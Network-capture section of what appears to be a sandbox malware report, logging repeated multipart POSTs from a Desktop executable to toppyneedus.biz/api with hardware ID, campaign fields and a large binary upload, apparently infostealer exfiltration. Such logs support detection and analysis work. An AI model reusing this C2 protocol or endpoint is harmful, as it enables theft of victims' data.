2025-01-26 14:48:03 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-26 14:48:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49703 | Destination IP: 172.67.149.66 | Destination Port: 443 | PID: 7120 | Process: C:\Users\user\Desktop\4JPKDcwtDo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:03 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=3W3GH7I4IB9Z3GWPK
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 15065
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:03 UTC15065OUTData Raw: 2d 2d 33 57 33 47 48 37 49 34 49 42 39 5a 33 47 57 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 33 57 33 47 48 37 49 34 49 42 39 5a 33 47 57 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 57 33 47 48 37 49 34 49 42 39 5a 33 47 57 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 33 57 33 47
                                                                                                  Data Ascii: --3W3GH7I4IB9Z3GWPKContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--3W3GH7I4IB9Z3GWPKContent-Disposition: form-data; name="pid"2--3W3GH7I4IB9Z3GWPKContent-Disposition: form-data; name="lid"4h5VfH----3W3G
2025-01-26 14:48:04 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:04 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=2oljai7g9n7j933qh6mlituov4; expires=Thu, 22 May 2025 08:34:43 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4etulM%2B1vtmxUr8wNTOCY4Iun%2BnpB8FEcMUefDTdOUO4PEG%2Bqnt9FdLSleYoosDVbBt4E%2B4O%2BcDgvPjSVP47r8tGinZ1284KCkwn2Py2ITLZ953DWFgZv52BFjLnzTOklM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d404a9bde98-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1510&rtt_var=572&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16003&delivery_rate=1901041&cwnd=226&unsent_bytes=0&cid=f47958bb1d4170d9&ts=890&x=0"
2025-01-26 14:48:04 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-26 14:48:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49705 | Destination IP: 172.67.149.66 | Destination Port: 443 | PID: 7120 | Process: C:\Users\user\Desktop\4JPKDcwtDo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:05 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=00T4M7OEH02
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 20354
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:05 UTC15331OUTData Raw: 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                  Data Ascii: --00T4M7OEH02Content-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--00T4M7OEH02Content-Disposition: form-data; name="pid"3--00T4M7OEH02Content-Disposition: form-data; name="lid"4h5VfH----00T4M7OEH02Content-D
                                                                                                  2025-01-26 14:48:05 UTC5023OUTData Raw: 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2025-01-26 14:48:06 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=8ahln77e6igloei8mf319ta31a; expires=Thu, 22 May 2025 08:34:44 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYJOF2mhW%2BHDNU3YXxFnSaQuGab1LYzKqN1Hp1r7iWTQuqAEbn1PXh%2B3JMYX09XKeShVdNawQXLYSCve7iP6pA%2BCv4SOhGFKKRMQj1Tu4hVfOXg1DjYXKv0GIStGfVZCTBI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d4a7d8e7cfc-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1979&rtt_var=748&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21308&delivery_rate=1457813&cwnd=226&unsent_bytes=0&cid=1ef69889f823856e&ts=659&x=0"
2025-01-26 14:48:06 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-26 14:48:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49711 | Destination IP: 172.67.149.66 | Destination Port: 443 | PID: 7120 | Process: C:\Users\user\Desktop\4JPKDcwtDo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:06 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=5T15HD77S8T
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 2595
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:06 UTC2595OUTData Raw: 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                  Data Ascii: --5T15HD77S8TContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--5T15HD77S8TContent-Disposition: form-data; name="pid"1--5T15HD77S8TContent-Disposition: form-data; name="lid"4h5VfH----5T15HD77S8TContent-D
2025-01-26 14:48:07 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:07 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=ef0rslij4mcjbeg3n31mfmc612; expires=Thu, 22 May 2025 08:34:46 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1ALHa4T834c9Am9%2F4yhiDn42V2u0xoUhCS0fuji5b%2B24c4sOkmAJZ%2FI5s9I40sUEbMJgPKLHU5RWjQBZj9VolKMryCd2Z7CGIzUIdGKHi%2Bm5IfZXpEq5vAZsIbQ2WeERfs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d53e97f41a1-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1586&rtt_var=615&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=3504&delivery_rate=1748502&cwnd=231&unsent_bytes=0&cid=e1bcae55817885d0&ts=513&x=0"
2025-01-26 14:48:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
2025-01-26 14:48:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49722 | 172.67.149.66 | 443 | 7120 | C:\Users\user\Desktop\4JPKDcwtDo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:08 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=GKFMC2XGC
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 557249
                                                                                                  Host: toppyneedus.biz
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                  Data Ascii: --GKFMC2XGCContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--GKFMC2XGCContent-Disposition: form-data; name="pid"1--GKFMC2XGCContent-Disposition: form-data; name="lid"4h5VfH----GKFMC2XGCContent-Dispositi
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: 94 1a 4f 5a 33 91 52 73 4a 56 73 08 96 e9 29 45 7c 02 6f a6 b4 0c 53 7c 1e b3 48 4e e3 b6 04 ba ca b3 b9 8e 78 0e 71 4d 7e 78 c9 b9 e0 97 ed c3 6c 12 91 da 81 a2 08 6c 49 af 7d 0b 86 0d 76 15 a6 47 19 61 61 bf 05 68 83 1b bb 64 a2 a0 5c db 2f 9c 07 92 97 9d 97 26 3f ba ed f8 28 96 7c a1 a9 72 aa d4 ae 08 66 9e cb cc 28 83 3a f9 52 c0 95 85 7e ef 95 eb 7c e6 9e 26 54 c1 ad 83 1b 36 9a 29 35 1e b5 b1 74 3f 39 d4 ba 28 ef cc 70 f8 75 40 8b a6 55 27 ad ec 49 da 39 b2 65 59 de b2 1b f6 03 5f 95 2c 08 b9 87 29 0f e2 04 ab da 95 41 b4 80 e6 a7 9d 81 80 c4 d8 60 99 ed ef 6a 94 56 14 65 f1 71 f5 8a b2 46 be 0d 12 52 1c 40 da f4 30 36 a5 7d 41 25 cf b5 02 5f 2f 4f 79 12 d8 a6 0f 08 85 77 6e 8b 3c 84 99 46 7d b7 03 e0 c8 4b c4 67 c9 d6 2a 8c ee 65 73 38 b6 0f e6 08
                                                                                                  Data Ascii: OZ3RsJVs)E|oS|HNxqM~xllI}vGaahd\/&?(|rf(:R~|&T6)5t?9(pu@U'I9eY_,)A`jVeqFR@06}A%_/Oywn<F}Kg*es8
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: f5 6b e6 bd 2d 29 05 95 9c 97 4c b7 8f ae 75 83 78 5d ea 8f 35 43 ee b9 01 fa c5 1f a6 04 77 37 de 17 f5 b8 d2 ad 9e a5 5f 3c 9c 7c 97 5e 39 b0 9d fb e3 01 df c7 07 ad cb 3b 95 a3 6b 7e 05 4f 1f be 94 1a e6 3c 5d 7d f9 f4 e6 af b7 aa 97 9b 57 7b ea 36 d9 ab b5 db 6e 2f e2 1f aa cd 49 83 61 ef 81 82 af 1f af 39 a6 a5 1b 8e 47 ae 4e dc b7 5a 67 2e c5 92 0d c9 dc 7e 6c 22 c1 69 21 b3 ab 54 51 c2 ff 73 ac cf 32 4d b5 30 36 c5 43 36 f9 d1 ea 81 5a b7 8c aa 87 39 4b 46 f4 73 68 5e 4d d0 c3 24 94 ae c9 5c 4d dc 8f 50 db f0 de 7b 7f 3d a6 1f 38 04 57 07 b6 38 6a f7 04 fb a3 81 db 65 ef 88 58 1f ba 34 7a da 0d 62 f2 91 8d 0f 86 89 60 53 ff 91 f0 b9 8b 95 9b 8f 6d 96 d9 f8 00 32 cd 2a 8b e0 08 2d a2 de 6f 77 8f 91 e4 0e 52 e4 ee 06 47 64 7f 55 36 72 f5 aa 68 b3 ef
                                                                                                  Data Ascii: k-)Lux]5Cw7_<|^9;k~O<]}W{6n/Ia9GNZg.~l"i!TQs2M06C6Z9KFsh^M$\MP{=8W8jeX4zb`Sm2*-owRGdU6rh
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: 4e be 52 b7 05 eb 7a 0e f2 07 b3 a5 54 ab b4 9f ef 93 36 6b 12 3c d7 99 16 09 c3 11 9e 7c 28 4e f7 6f 21 5f 6c f1 6d 96 57 4a 73 97 af e4 bd 2f d7 30 8b 4f d5 13 1e 90 b7 d7 b0 0b 5c 25 3d d4 09 95 dd 5e 1c 98 10 ff de f1 d3 c7 56 21 7d b5 46 e8 8a 98 ba 51 7a 9a a0 eb 77 83 f6 1f 9d 37 67 d3 74 71 47 15 fb 5c 41 aa 54 ee b0 a7 7a ef 9c d1 8e 51 d1 9b 5b 70 e7 0b 8f b1 3b 82 27 9f 9d 05 fe 70 98 27 cf cf aa 2c 21 46 97 bc 51 98 e1 6c 91 06 04 49 1c 2d 93 f3 86 0e 2f be 05 ea d0 f2 ed a9 f2 e2 f4 dc 7e 3b 72 bf 0b bf a9 fb 54 5e c5 25 85 bb 43 1a b7 d3 cd 3e 12 73 79 97 0f 47 e3 f2 b5 1a dc 7e 5e f0 2e cf e7 11 b4 34 c1 48 0b 55 6c d6 ac 8c bc 23 2e 9b d9 b9 4c fd f0 e6 7c bf 6f 94 a3 4f 10 67 6a 95 ff 09 77 e0 03 0d 4c 47 67 1e 66 38 02 5f 33 65 02 2c 32
                                                                                                  Data Ascii: NRzT6k<|(No!_lmWJs/0O\%=^V!}FQzw7gtqG\ATzQ[p;'p',!FQlI-/~;rT^%C>syG~^.4HUl#.L|oOgjwLGgf8_3e,2
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: aa 60 98 ca cb 6e 07 38 ea 87 a8 0e 53 c4 72 ad 27 fc 49 a9 5f 1f 6d 66 ec 76 c2 e7 c7 e7 3f f8 aa c8 37 7f 63 ee 53 43 bf 98 d0 4f a5 e8 20 86 11 3b b6 07 37 eb 47 78 38 9f f0 c0 b8 da d8 03 dd d1 95 97 32 e7 a2 10 36 b9 71 f6 63 5a b5 a1 9e 5c 42 93 e1 a5 e9 aa 27 f4 64 b4 b9 7a f6 c3 fe ee 05 16 98 f0 fc 55 a2 a6 44 a4 13 57 79 79 26 d6 0a be 12 83 6f 9d 7b 1a e1 a1 df f5 ee 25 a2 dd a8 b6 bf 71 1b fe 8c 71 e7 5b 5d 3b 99 5f 67 1b e2 17 9a 3e 7b bd 4d ed c5 4d 43 3b 11 e2 ab 86 f8 a6 63 c9 68 cf 42 8a fa c8 c1 08 f5 ac f8 b8 cf 92 a3 d0 b2 c8 ea a1 d9 06 57 f5 6b 9c eb 87 f0 2f 28 09 2e 6e 46 f3 5a 91 76 70 9b c2 9a 2f aa dd 78 13 41 29 8a 60 fa cf d8 98 ae b8 b5 62 1c 57 cf 40 71 2a fb 6c c8 ca fb d8 9e df 35 87 30 3e 16 d5 bf 86 55 71 fb 92 e9 ba 7a
                                                                                                  Data Ascii: `n8Sr'I_mfv?7cSCO ;7Gx826qcZ\B'dzUDWyy&o{%qq[];_g>{MMC;chBWk/(.nFZvp/xA)`bW@q*l50>Uqz
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: 37 68 e6 11 3c 5f 21 d9 0d 13 b0 1f 62 7c 98 eb 5a fa 31 77 55 62 e3 da 4c 50 de 9d 6e 97 f3 c3 9f f2 84 b0 60 7f fb d4 ae c3 c9 f7 50 27 fe 32 d7 02 09 df d1 db de bd c3 25 7a c3 39 ee 46 8c 45 11 79 56 08 ec af 9f 1a 4d 39 bc bd 12 89 8f 7d c3 31 b0 f6 9b 29 62 a3 5a 5c e1 f7 54 04 85 8c f8 84 bc 1c 66 38 b5 b9 6c d3 e7 33 5e d4 4f 77 4a 4d 9c d7 8f 3c a6 11 ff d1 08 31 ee db 05 b3 2d 28 be e8 1d 1d 72 61 c1 9a 1c 39 54 e4 4d 1e aa c0 bc 4a d7 d9 bd e6 f3 59 2c 49 54 f5 ae 7a df 12 8e 0a 88 60 62 7c 82 5e e3 41 60 de 3c 62 65 9b 86 68 b4 f6 9f f3 3e 18 da 5e 8a 5a 89 45 51 36 dd ed c3 8b 31 11 a0 a5 09 08 fc 40 61 f0 39 34 9f 4c bd ba 45 e1 23 5c e3 80 54 85 1a 83 42 28 1e 9f 7e 36 3b ea 68 d9 16 58 64 ae 0d 2b e6 2a ed cd 26 25 58 90 35 05 96 ec 8d bf
                                                                                                  Data Ascii: 7h<_!b|Z1wUbLPn`P'2%z9FEyVM9}1)bZ\Tf8l3^OwJM<1-(ra9TMJY,ITz`b|^A`<beh>^ZEQ61@a94LE#\TB(~6;hXd+*&%X5
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: 29 bd 7a 29 ac 5b 3c 9b 9c d0 4a c3 01 81 72 84 f6 cd 97 bc c9 30 11 26 00 d3 b9 59 c3 49 ec 56 c8 f3 6d 4b 9a db 10 3c c3 77 8e 84 b5 99 72 5b fe 2f 97 50 57 63 30 e9 2d d8 78 a7 7b 24 5a 1b e7 14 79 49 02 71 63 24 5a 17 11 d4 4b fd 37 94 48 46 b5 b2 fb ae ef 6b 65 17 be c1 ab 55 20 c4 65 94 0d 07 f5 bd 52 91 b7 81 5f 19 a2 1d c2 9a 47 fa f7 7d f7 80 84 5a b0 af 6d 0b d2 5a d9 11 40 66 b9 f0 66 f2 03 8c 54 4c 9f b7 c0 80 cc a1 ab 39 af fe 92 a0 69 88 f7 50 df 3e d8 6c 95 c0 67 d3 1e 09 11 67 b7 3a 03 8a 77 37 e8 21 b3 84 cc 83 9e 5d 53 d1 f9 f7 c2 6b c6 99 2b d5 7c 9c 22 91 e4 8d 0b 70 38 1c ec 27 8b d8 82 78 ea 9c ac b8 0a 94 a9 06 8a 8e 2b 1a 5b 82 6c 2f 9a cc 8e 97 01 da 81 cc cd c6 62 ab 51 27 ac a6 50 7e 8f cc c2 28 28 3f 3e d0 dd e1 66 f6 aa 75 8b
                                                                                                  Data Ascii: )z)[<Jr0&YIVmK<wr[/PWc0-x{$ZyIqc$ZK7HFkeU eR_G}ZmZ@ffTL9iP>lgg:w7!]Sk+|"p8'x+[l/bQ'P~((?>fu
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: 6b e1 68 eb ab 33 65 f3 8b 8d 9c 93 cb 6d 04 4d b6 c2 52 e1 70 fa e6 b6 45 84 26 9f 59 3b 5b f6 45 c8 a2 46 a8 c6 40 b8 30 f3 fa 19 31 d1 b1 f6 69 7a 82 fb 35 a1 0f 0d ce b7 1c 7a 85 76 ee 9c 05 7d cc f5 95 ff 2d 79 90 97 0f 3d d7 f6 91 ee 2d 44 f4 df 3e 3f bf cf 46 f5 d2 f9 23 fc 59 01 76 b3 6b 9b b9 27 71 be 48 a5 56 81 f1 41 5a 07 16 75 b2 50 e0 e8 2b ab 83 bb 78 57 90 7a 82 42 50 e5 31 8a 3a 2a 25 1f 68 05 f1 68 d0 6e 99 fc 38 73 94 5b c6 03 14 c3 f6 6b ef 0d cd 5e ac b1 0a 8e 8c 01 70 ea 43 ae fc a1 39 1f d1 02 ac d5 aa 3d 40 ff 5e 1d b2 93 07 64 65 e8 62 f5 8f 2e d3 51 c0 c4 b8 59 07 39 80 2d 48 85 be 1a c0 7c 40 1d 75 ae 94 5b 83 e3 d2 a6 97 0a 85 88 b9 ae f9 7c ac 33 fa 99 1a b5 ba f2 41 41 b2 e0 d4 42 cd 15 ef ef 4d 77 af 69 90 ce af 26 a1 f1 7c
                                                                                                  Data Ascii: kh3emMRpE&Y;[EF@01iz5zv}-y=-D>?F#Yvk'qHVAZuP+xWzBP1:*%hhn8s[k^pC9=@^deb.QY9-H|@u[|3AABMwi&|
2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: 93 f4 45 2d a8 ad 46 42 40 e6 c9 59 3b ce f4 f8 d5 11 e8 6f ee 11 39 f7 02 f0 2f 48 2f a9 c0 b8 85 41 31 ad ea af 9f db d1 0f 86 af 80 1f 97 7e af 3e 33 bb ec 08 8c 8e c1 92 21 f1 f4 de 9d 43 06 48 0e 3a b2 72 6a f5 d4 cf 06 24 a3 4c 1c cb a1 05 74 5e 4d 59 ec 21 29 2b 02 fb da 5c 86 fd 6c f5 1b db bb 21 ad 37 9e a8 74 1c a5 67 e0 9a f3 8b 07 3b 7f 15 29 9c 80 aa d7 3e 78 dd 6c f5 33 c8 d4 91 9d b6 91 de 74 a1 82 e2 17 8d 09 d3 2e 11 8a cf 0f de d6 20 ae ba 42 48 b4 f6 37 fe 1c bb 1e 4e d9 b0 e1 a9 98 62 e9 f0 25 49 5e da f5 a2 96 dd 7b 2d 46 26 b3 88 6e ae f4 91 74 8b 8f 39 e9 83 d5 bd 6f 9e b9 2e ba 38 94 49 d1 2d af af 3d c8 0b ee 92 c9 0b be 1c 75 23 cb fc 31 70 6f a1 cb 90 f0 7d 9c c7 bf 5f a3 a0 67 59 96 4f 5b 85 c0 83 d3 73 35 65 c9 69 5e 58 70 8b
                                                                                                  Data Ascii: E-FB@Y;o9/H/A1~>3!CH:rj$Lt^MY!)+\l!7tg;)>xl3t. BH7Nb%I^{-F&nt9o.8I-=u#1po}_gYO[s5ei^Xp
